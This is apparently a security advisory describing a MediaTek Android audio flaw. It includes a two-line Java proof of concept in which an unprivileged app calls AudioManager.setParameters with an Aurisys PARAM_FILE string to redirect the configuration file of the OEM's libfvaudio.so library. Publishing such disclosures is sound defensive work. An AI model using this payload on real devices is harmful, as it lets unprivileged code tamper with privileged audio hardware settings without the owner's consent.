Information

Dangerous audio hardware parameter is accessible for an unprivileged application in the
release build of Android. The PARAM_FILE command could be used to set the location
of the configuration file related to a particular Aurisys HAL library.

PoC:

// Customize the libfvaudio.so HAL library provided by the OEM

AudioManager am = (AudioManager)getSystemService(Context.AUDIO_SERVICE);
am.setParameters("AURISYS_SET_PARAM,DSP,ALL,FV_SPH,PARAM_FILE,<file path>=SET");


References:
https://corp.mediatek.com/product-security-bulletin/December-2021
https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp